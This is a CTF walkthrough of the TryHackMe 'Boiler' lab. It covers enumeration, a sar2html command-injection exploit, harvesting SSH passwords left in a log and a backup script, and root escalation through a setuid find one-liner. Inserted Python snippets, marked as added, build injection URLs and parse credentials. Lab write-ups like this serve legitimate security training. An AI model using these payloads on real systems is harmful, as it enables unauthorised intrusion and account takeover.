Boiler CTF TryHackMe

Ashutosh Gupta
9 min read · Aug 16, 2020


Hello folks! I am Ashutosh Gupta a.k.a “m3ta_c1ph4r”. I have been doing TryHackMe for the last two months, and I can say it is the best place for beginners and intermediates. There are many rooms in which you can practise and polish your skills, on every topic, labelled from easy to hard, with step-by-step exploitation of machines. This is my first TryHackMe writeup on Medium. So let's begin the fun!

Link for the room https://tryhackme.com/room/boilerctf2

First join the room, then deploy the machine.

TASK 1 : ENUMERATION

  • NMAP:

As many of you know, the first thing we do is an nmap scan. The command is:

$ nmap -sC -sV 10.10.32.78 -oN nmap
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-16 16:55 IST
Nmap scan report for 10.10.32.78
Host is up (0.32s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.8.82.50
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
10000/tcp open http MiniServ 1.930 (Webmin httpd)
|_http-server-header: MiniServ/1.930
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.56 seconds

-sC runs the default set of NSE scripts against the open ports (that is what revealed the anonymous FTP login and robots.txt here).

-sV probes the open ports to determine service and version info.

Three ports are open. As you can see, anonymous FTP login is allowed, so let's check whether anything is stored there.

$ ftp 10.10.32.78

Running this connects to the FTP server; when it prompts for a name, enter anonymous (any password is accepted). You are then logged in.

Now list the files and directories with ls. Nothing is shown, so check for hidden ones with ls -la.

  • l - long listing format
  • a - show all entries, including hidden files whose names start with a dot

This reveals a hidden file named .info.txt. You cannot read it in place, because FTP only transfers files; download it with get .info.txt.

Then type exit. The file is now on your machine.

And here you get the first answer of Task 1.

Task 1–1:

txt

Task 1–2:

nmap -p- <machine ip>

Scanning all 65535 ports shows that the highest open port is 55007, and SSH is running on it.

Task 1–3:

In the nmap you see 
10000/tcp open http MiniServ 1.930 (Webmin httpd)
webmin is running

Task 1–4:

Google for Webmin exploits. Checking them, you will find there is no public exploit for this version of the service; it is up to date.

Let's come back to the file we got from FTP.

$ cat .info.txt
Whfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl!

You may wonder what this is: it is ROT13-encoded text. ROT13 is a substitution cipher that replaces each letter with the letter 13 places after it in the alphabet; because 13 is half of 26, applying it a second time decodes it. I used this website to decode it.

There you get this after decoding this.

Just wanted to see if you find it. Lol. Remember: Enumeration is the key!

It just says that enumeration is the key, which means we have to enumerate more.

  • Gobuster

Let's do directory brute-forcing. For this I used gobuster.

gobuster dir -u http://10.10.32.78/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,xml -t 100 2>/dev/null
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.32.78/
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt,xml,php,html
[+] Timeout: 10s
===============================================================
2020/08/16 17:51:00 Starting gobuster
===============================================================
/index.html (Status: 200)
/manual (Status: 301)
/robots.txt (Status: 200)
/joomla (Status: 301)

dir - directory and file brute-forcing mode

-u - the target URL

-w - path to the wordlist

-x - extensions to append to each word, so files such as name.php and name.txt are tried as well

-t - number of concurrent threads, to speed up the scan

Let's check what we got in robots.txt.

User-agent: *
Disallow: /

/tmp
/.ssh
/yellow
/not
/a+rabbit
/hole
/or
/is
/it

079 084 108 105 077 068 089 050 077 071 078 107 079 084 086 104 090 071 086 104 077 122 073 051 089 122 085 048 077 084 103 121 089 109 070 104 078 084 069 049 079 068 081 075

If you open all these directories you get Not Found: they are all rabbit holes. So let's see what the numbers are and decode them.

Each number is a decimal ASCII code, so first convert ASCII to text, using this link. http://www.unit-conversion.info/texttools/ascii/#data

We got this after decoding:

OTliMDY2MGNkOTVhZGVhMzI3YzU0MTgyYmFhNTE1ODQK

That mix of upper-case, lower-case and digits is base64, so next use CyberChef to decode it from base64.

After decoding we get a hash:

99b0660cd95adea327c54182baa51584

Thirty-two hex characters points to MD5. I used crackstation to look it up. https://crackstation.net/

Crackstation confirms it is an MD5 hash and gives the plaintext:

kidding

This might be a password, but we don't yet know for what.
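The whole clue chain in one script, added here as an example and not part of the original writeup: ROT13 for the FTP note (the same operation both encodes and decodes), then decimal ASCII to base64 to the 32-character hex string from robots.txt, with a shape check and an offline MD5 comparison for whatever a lookup service such as crackstation returns. The two clue strings are copied from the page; nothing else is assumed.

```python
import base64
import codecs
import hashlib
import re

# Clues copied from the page: the hidden FTP file and the number run at the
# bottom of robots.txt.
INFO_TXT = "Whfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl!"
ROBOTS_NUMBERS = (
    "079 084 108 105 077 068 089 050 077 071 078 107 079 084 086 104 090 071 "
    "086 104 077 122 073 051 089 122 085 048 077 084 103 121 089 109 070 104 "
    "078 084 069 049 079 068 081 075"
)


def rot13(text: str) -> str:
    """ROT13 is its own inverse: the same call encodes and decodes."""
    return codecs.decode(text, "rot13")


def decimal_ascii_to_text(numbers: str) -> str:
    """Turn a run of zero-padded decimal byte values into the text they spell."""
    return "".join(chr(int(n)) for n in numbers.split())


def decode_robots_chain(numbers: str) -> str:
    """Decimal ASCII -> base64 -> the string the CTF author buried."""
    b64 = decimal_ascii_to_text(numbers)
    # The base64 carries a trailing newline (the 'K' at the end); strip it so
    # the recovered digest is clean.
    return base64.b64decode(b64).decode("ascii").strip()


def looks_like_md5(value: str) -> bool:
    """32 lower-case hex characters is the shape of an MD5 digest."""
    return re.fullmatch(r"[0-9a-f]{32}", value) is not None


def matches_md5(candidate: str, digest: str) -> bool:
    """Offline check of a cracked candidate against the recovered digest."""
    return hashlib.md5(candidate.encode()).hexdigest() == digest.lower()


if __name__ == "__main__":
    print(rot13(INFO_TXT))
    digest = decode_robots_chain(ROBOTS_NUMBERS)
    print(digest, "(md5-shaped)" if looks_like_md5(digest) else "(not md5-shaped)")
    # The page reports crackstation resolved this digest to "kidding".
    print("kidding matches:", matches_md5("kidding", digest))
```

Verifying the candidate locally with matches_md5 is worth the extra line: an online cracker's answer is only as trustworthy as its table, and the check costs nothing.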

So let's look at the other things gobuster found. We have two directories, joomla and manual. Let's google what joomla is.

Task 1–5:

Googling joomla tells you that Joomla is a CMS.
So your answer for this is "joomla"

Let's enumerate more. As joomla is a sub-directory, we can brute-force inside it too.

gobuster dir -u http://<ip>/joomla -w /usr/share/dirb/wordlists/common.txt -t 50
[+] Url: http://10.10.2.36/joomla
[+] Threads: 50
[+] Wordlist: /usr/share/dirb/wordlists/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/08/16 20:43:44 Starting gobuster
===============================================================
/_files (Status: 301)
/_test (Status: 301)
/~www (Status: 301)
/.htaccess (Status: 403)
/.hta (Status: 403)
/.htpasswd (Status: 403)
/administrator (Status: 301)
/_archive (Status: 301)
/_database (Status: 301)
/bin (Status: 301)
/build (Status: 301)
/cache (Status: 301)
/components (Status: 301)
/images (Status: 301)
/includes (Status: 301)
/installation (Status: 301)
/language (Status: 301)
/layouts (Status: 301)
/libraries (Status: 301)
/media (Status: 301)
/modules (Status: 301)
/plugins (Status: 301)
/index.php (Status: 200)
/templates (Status: 301)
/tests (Status: 301)
/tmp (Status: 301)
==================================================================

There are quite a few directories; after going through them I found one worth a closer look, /_test.

The page there shows “sar2html” on the left. Searching for it turns up an exploit on exploit-db: https://www.exploit-db.com/exploits/47204

It gives remote code execution (RCE): the plot parameter is handed to a shell unsanitised, so a semicolon ends the intended command and whatever follows it runs on the server.

http://<ipaddr>/index.php?plot=;<command-here> will execute
http://10.10.2.36/joomla/_test/index.php?plot=;whoami
The output is not printed on the page; open the "select host" drop-down and it appears as the last entry, here the web server user www-data.

Next I listed the files on the server the same way, with plot=;ls.

Task 1–6:

Among the files listed, the odd one out is log.txt.
So the answer is log.txt

Open it with cat log.txt (again through the plot parameter) and scroll through the drop-down entries. The sixth one contains a username and a password:

Aug 20 11:16:35 parrot sshd[2451]: Accepted password for basterd from 10.1.1.1 port 49824 ssh2 #pass: superduperp@$$

So the username is basterd and the password is superduperp@$$. The #pass: tail is not something sshd writes; the CTF author appended it to the log line.

Now we can log in over SSH, since we know the username, the password and the host, and that SSH listens on port 55007.

And Boom! you got the shell.
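The RCE step as a script, added here as an example; it is not code from the original post or from the exploit-db entry. It builds the plot injection URL, pulls the drop-down entries out of a response (the sample response below is constructed, not captured from the box, and the exact HTML sar2html emits is an assumption), and parses the sshd "Accepted password" line from log.txt. It sends no request itself: feed build_injection_url to curl or requests against the live target and pass the body to extract_select_options.

```python
import html
import re
from urllib.parse import quote

# Base URL from the page; the command is injected after a ';' in 'plot'.
SAR2HTML_URL = "http://10.10.2.36/joomla/_test/index.php"


def build_injection_url(base_url: str, command: str) -> str:
    """Build the sar2html 'plot' injection URL, percent-encoding the command so
    spaces and shell metacharacters survive the trip through the query string."""
    return f"{base_url}?plot=;{quote(command, safe='')}"


def extract_select_options(page: str) -> list:
    """Pull the <option> texts out of the response. sar2html appends the injected
    command's output to its host drop-down, so the payload output is whatever
    follows the legitimate host entries (assumed structure, see lead-in)."""
    opts = re.findall(r"<option[^>]*>(.*?)</option>", page, flags=re.I | re.S)
    return [html.unescape(o).strip() for o in opts]


# sshd's real 'Accepted password' format, plus the optional '#pass:' tail the
# CTF author added by hand.
SSHD_ACCEPT = re.compile(
    r"Accepted password for (?P<user>\S+) from (?P<src>\S+) port \d+ ssh2"
    r"(?:\s*#pass:\s*(?P<password>\S+))?"
)


def parse_sshd_accept(line: str):
    """Return (user, password_or_None) from an sshd 'Accepted password' line,
    or None when the line is not a successful password login."""
    m = SSHD_ACCEPT.search(line)
    if not m:
        return None
    return m.group("user"), m.group("password")


# Constructed sample response, not captured from the box: the select with the
# placeholder, one real host, then the output of 'whoami'.
SAMPLE_RESPONSE = """<select name="host">
<option value="">Select Host</option>
<option>server1</option>
<option>www-data</option>
</select>"""

# Log line copied from the page.
SAMPLE_LOG_LINE = ("Aug 20 11:16:35 parrot sshd[2451]: Accepted password for basterd "
                   "from 10.1.1.1 port 49824 ssh2 #pass: superduperp@$$")

if __name__ == "__main__":
    print(build_injection_url(SAR2HTML_URL, "cat log.txt"))
    print("command output:", extract_select_options(SAMPLE_RESPONSE)[-1])
    print("credentials:", parse_sshd_accept(SAMPLE_LOG_LINE))
```

Percent-encoding the command matters as soon as it contains a space: cat log.txt sent raw would be truncated to cat by the URL parser, which is a common reason this exploit "does not work".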

Task 2: POST Enumeration

TASK 2–1 :

Now that you have a shell, check the files and directories. You will find one named backup.sh.

Let's see what is in backup.sh:

$ cat backup.sh
REMOTE=1.2.3.4
SOURCE=/home/stoner
TARGET=/usr/local/backup
LOG=/home/stoner/bck.log

DATE=`date +%y\.%m\.%d\.`
USER=stoner
#superduperp@$$no1knows
ssh $USER@$REMOTE mkdir $TARGET/$DATE
if [ -d "$SOURCE" ]; then
    for i in `ls $SOURCE | grep 'data'`;do
        echo "Begining copy of" $i >> $LOG
        scp $SOURCE/$i $USER@$REMOTE:$TARGET/$DATE
        echo $i "completed" >> $LOG
        if [ -n `ssh $USER@$REMOTE ls $TARGET/$DATE/$i 2>/dev/null` ];then
            rm $SOURCE/$i
            echo $i "removed" >> $LOG
            echo "####################" >> $LOG
        else
            echo "Copy not complete" >> $LOG
            exit 0
        fi
    done
else
    echo "Directory is not present" >> $LOG
    exit 0
fi

Here you find another user and their password, left in a comment right under the USER line.

USER=stoner
superduperp@$$no1knows

The answer for task 2–1 is backup, because the question asks where the other user's password is stored and does not want the extension.

answer is: backup

Lets login with stoner using ssh.

Task 2–2:

Let's find the user flag. The user flag is usually in /home/<username>.

So let's go there: cd /home/stoner

And do ls -la to check what files and directories we are having.

stoner@Vulnerable:~$ ls -la
total 20
drwxr-x--- 4 stoner stoner 4096 Aug 16 19:13 .
drwxr-xr-x 4 root root 4096 Aug 22 2019 ..
drwx------ 2 stoner stoner 4096 Aug 16 19:13 .cache
drwxrwxr-x 2 stoner stoner 4096 Aug 22 2019 .nano
-rw-r--r-- 1 stoner stoner 34 Aug 21 2019 .secret

Here we have one hidden file; let's see what it is.

stoner@Vulnerable:~$ cat .secret 
You made it till here, well done.

So the user flag is

You made it till here, well done.

Task 2 Privilege Escalation:

We have reached the last step: getting root.

For privilege escalation my first check is always for SUID binaries:

find / -perm -u=s 2>/dev/null

/ - start at the root of the file system, so the whole disk is searched

-perm -u=s - match files whose mode includes the setuid bit; such a binary runs with the privileges of its owner rather than of the user who launched it, so a root-owned setuid binary runs as root

2>/dev/null - send the error messages (permission denied on directories we cannot read) to /dev/null, the Linux black hole, so only the matches are shown

So lets see the output

/bin/su
/bin/fusermount
/bin/umount
/bin/mount
/bin/ping6
/bin/ping
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/apache2/suexec-custom
/usr/lib/apache2/suexec-pristine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/newgidmap
/usr/bin/find
/usr/bin/at
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/newuidmap

All of these run with root's privileges. Most are standard Ubuntu setuid binaries (su, mount, passwd, sudo and so on); the odd one out is /usr/bin/find, which is not setuid on a normal install. The best reference for abusing them is GTFOBins. https://gtfobins.github.io/

Look each one up there; if the entry has a SUID section, the binary can be abused to escalate.

Task 2–3:

Going through the list, find is the one with a SUID entry. Let's try it.

So the answer for this is - find

GTFOBins shows two lines. The first, sudo sh -c 'cp $(which find) .; chmod +s ./find', only sets up a setuid copy of find for a lab; it errors here and is not needed, because /usr/bin/find is already setuid root. The second line refers to ./find, which we never created, so run it against the system find instead. The -p flag tells the shell to keep the elevated effective UID rather than dropping back to the real user:

find . -exec /bin/sh -p \; -quit

So lets copy this and paste it . And crossed finger if it works or not.

And boom! we got the root :)
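The SUID check with a first round of triage, added as an example and not code from the page: it walks the file system the way find / -perm -u=s does, then reports the root-owned setuid binaries that are not in a baseline of what Ubuntu normally ships, which is the list to look up on GTFOBins first. The baseline set is an assumption (the standard Ubuntu 16.04 setuid set, matching the page's listing minus find), and PAGE_LISTING is the page's output with every file assumed to be root-owned.

```python
import os
import stat
import sys

# Setuid-root binaries normally present on an Ubuntu 16.04 box. This baseline
# is an assumption for illustration; tune it per distribution before trusting
# its verdicts.
UBUNTU_BASELINE = {
    "/bin/su", "/bin/fusermount", "/bin/umount", "/bin/mount", "/bin/ping6",
    "/bin/ping", "/usr/lib/policykit-1/polkit-agent-helper-1",
    "/usr/lib/apache2/suexec-custom", "/usr/lib/apache2/suexec-pristine",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/eject/dmcrypt-get-device", "/usr/bin/newgidmap", "/usr/bin/at",
    "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/passwd", "/usr/bin/newgrp",
    "/usr/bin/sudo", "/usr/bin/pkexec", "/usr/bin/gpasswd", "/usr/bin/newuidmap",
}

# The page's `find / -perm -u=s` output, assumed root-owned (uid 0) for the demo.
PAGE_LISTING = [(p, 0) for p in """
/bin/su /bin/fusermount /bin/umount /bin/mount /bin/ping6 /bin/ping
/usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/apache2/suexec-custom
/usr/lib/apache2/suexec-pristine /usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device
/usr/bin/newgidmap /usr/bin/find /usr/bin/at /usr/bin/chsh /usr/bin/chfn
/usr/bin/passwd /usr/bin/newgrp /usr/bin/sudo /usr/bin/pkexec
/usr/bin/gpasswd /usr/bin/newuidmap
""".split()]


def find_setuid_files(root="/"):
    """Python equivalent of `find / -perm -u=s`: yield (path, uid) for every
    regular file with the setuid bit, skipping anything that cannot be stat'ed."""
    for dirpath, dirnames, filenames in os.walk(root):
        # Do not descend into pseudo-filesystems; they are noise and can hang.
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in ("/proc", "/sys", "/dev")]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                yield path, st.st_uid


def triage(setuid_files, baseline=UBUNTU_BASELINE):
    """Return the root-owned setuid binaries that are not in the baseline,
    i.e. the ones worth looking up on GTFOBins first."""
    return sorted(path for path, uid in setuid_files
                  if uid == 0 and path not in baseline)


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "/"
    for path in triage(find_setuid_files(root)):
        print("unexpected setuid root binary:", path)
```

Filtering on uid 0 matters: a setuid binary owned by an unprivileged user only gets you that user, so it belongs in a second pass, not the first.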

Task 2–4:

So we can take root flag.

# cd /root              
# ls
root.txt
# cat root.txt
It wasn't that hard, was it?

So the root flag is :

It wasn't that hard, was it?

I hope you enjoyed this and learned something. It was a fun CTF with a lot of trolling.

So see you again!

Linkedin profile : www.linkedin.com/in/ashutosh-gupta-152142193

Instagram profile for the updates : https://www.instagram.com/gupta_ashuu/
